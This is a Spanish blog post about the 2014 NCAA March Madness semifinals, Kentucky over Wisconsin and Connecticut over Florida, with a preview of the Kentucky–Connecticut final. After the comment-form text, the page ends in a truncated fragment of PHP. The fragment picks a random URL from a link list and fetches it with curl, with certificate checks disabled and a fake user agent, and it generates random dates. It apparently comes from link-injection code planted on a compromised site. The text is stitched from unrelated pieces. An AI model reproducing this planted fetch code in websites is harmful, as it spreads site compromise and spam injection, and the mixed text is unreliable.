March Madness 2014: Hoy, la gran final

07 de April de 2014 por Ruxixon

A las 3h00 hora española, se enfrentarán en Arlington (Texas) ante unos 80000 espectadores los Connectitut Huskies y los Kentucky Wildcats. Pero antes de ir a la previa repasamos como fueron las semifinales de un torneo emocionantísimo, como prácticamente siempre:

KENTUCKY (8) – WISCONSIN (2)

Y lo volvió a hacer. Cuando aún nos relamíamos con el triple ganador de Aaron Harrison frente a Michigan, otro game winner del “bueno de los gemelos” lleva a Kentucky a la oportunidad de levantar su 9º trofeo nacional tras derrotar 74 a 73 a Wisconsin. Parece que a Kentucky le gusta navegar en un constante déjà vu. Wisconsin empezó muy fuerte apoyándose en su tiro exterior (Ben Brust 15 puntos) y siendo muy agresivos de cara al aro, que aunque no le servía para sumar en primera instancia, sí que les llevaba a la línea de personal, donde realizaron un partido casi inmaculado (19-20 TL). Por su parte a Kaminsky le tocó hacer el trabajo sucio intimidando a los interiores de Kentucky, que pudo mantenerse en el partido aferrándose a un gran James Young (17 puntos), gracias al cual consiguieron reducir la desventaja de 9 a 4 puntos al finalizar la primera parte.

Justo tras la reanudación y tras triple de Dekker (15 puntos), llegó el tiempo muerto solicitado por Calipari que activó el catalizador de los Wildcats. Un gran parcial de 15-0, con ya los interiores haciendo acto de presencia (Dakari Johnson 10-7, Randle 16-5 y Poythress 8-7), dio la vuelta al partido aunque Wisconsin no permitió que fuera a más y a base de triples consiguió igualar las cosas. Los 12 minutos finales fueron un continuo intercambio de canastas que tuvieron su punto álgido a falta de 52 segundos. Andrew Harrison encadenó 2 acciones consecutivas que parecían sepultar las opciones de Kentucky, primero un triple mal tirado cuando aún faltaban 19 segundos de posesión y posteriormente, una falta en el triple tras comerse el amago de Traevon Jackson (12 puntos). Los Badgers llevaban 17 de 17 en los libres y Jackson sólo había fallado 2 de 19 en el torneo así que los rostros de los jugadores del banquillo de los Wildcats no presagiaban nada bueno. Sin embargo Jackson fallaría su primer tiro, el único fallo de la noche, y con 2 arriba Wisconsin y a falta de 5.7 segundos, un Aaron Harrison no especialmente inspirado hasta el momento (3-8 en el tiro) tomó la palabra. 

CONNECTICUT (7) – FLORIDA (2)

A menudo se comenta que para que un equipo gane un campeonato debe saber lidiar con cualquier situación. Florida llegaba a estas semifinales nacionales sin recordar lo que era una derrota pues ya acumulaba 30 victorias consecutivas. La solidez de los Gators ha sido tal que sólo ha perdido en 2 ocasiones, aunque estas derrotas comparten una estadística similar: cuando se fueron perdiendo al descanso, perdieron el partido. Acostumbrados a dominar desde el inicio, verse por debajo al descanso supone para ellos una barrera complicada de derribar. El 25-22 favorable a los Huskies al final de la primera mitad ya indicaba que no sería el día de Florida y el 63-53 supone el cierre de temporada para el máximo favorito.

Connecticut ha demostrado durante el torneo que es capaz de defender al rival que se le ponga delante, sea cual sea su estilo y gracias a esta capacidad han llegado a la final. Anularon al perímetro de los Gators dejando a Frazier II en 3 puntos (sólo 3 tiros) y a Wilbekin en 4 (2 de 9 en tc), aunque en general el 1-10 en triples o el 38,8% de acierto resumen el partido. Prácticamente el único jugador que respondió fue Patric Young (19 p- 5 r), sumando en la pintura y evitando que la derrota fuera mucho más abultada. No obstante, los Gators arrancaron bien, con un 16-4 en los primeros 3 minutos y limitando la aportación de Napier, aunque en su lugar empezó a aparecer DeAndre Daniels, que acabó con 20 puntos y 10 rebotes. Durante la segunda mitad de la primera parte el parte se igualó y Connecticut tomó un liderazgo que ya no cedería desde el minuto 18 del encuentro. Los Huskies acabaron el partido con un 55,8 % en el tiro con unos destacados Napier (12 puntos, 6 asistencias y 4 robos), que se entonó en la segunda parte, y Boatright (13 puntos y 6 rebotes) además del ya mencionado Daniels.

PREVIEW KENTUCKY (8) – CONNECTICUT (7)

Partido entre equipos que llegan tocados por una varita y en un gran momento de confianza. A nivel emocional Kevin Ollie, entrenador de UConn, es capaz de motivar al 110% a sus jugadores. Este hecho unido a esa “frialdad” en los arranques de Kentucky posiblemente implique que Connecticut tome la iniciativa. La cuestión es cuánto tiempo podrán limitar un juego interior tan profundo como el de los Wildcats y mientras tanto anular a James Young, algo de lo que debe ocuparse Boatright. Si Connecticut lo consigue el partido es suyo, suponiendo una gran aportación de Napier y con Daniels jugando de fuera a dentro aprovechando la escasa defensa de equipo de Kentucky. Si Daniels entra a la batalla individual y de juego físico con Poythress, Dakari Johnson o Lee puede tener problemas. Tampoco hay que perder de vista la defensa sobre Aaron Harrison si hay momento para un game winner. Las apuestas favorecen a los hombres altos de Kentucky.

Datos

  • La última derrota de Kentucky en el March Madness data del 2011 (en 2012 fueron campeones y en 2013 no se clasificaron), precisamente ante Connecticut.
  • De entre todos los equipos que han llegado a la final nacional a lo largo de la historia de la MM, Kentucky es el que menor margen de puntos ha conseguido respecto a sus rivales en el torneo (+18). Los precedentes no son demasiado optimistas pues Butler (+21), Arkansas (+22) y Georgia Tech (+23) perdieron en su partido por el campeonato.
  • En las 5 apariciones de Connectitut en la FF (incluida esta) tienen un balance de 9 victorias y 1 derrota, y siempre que han llegado a la final la han ganado.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>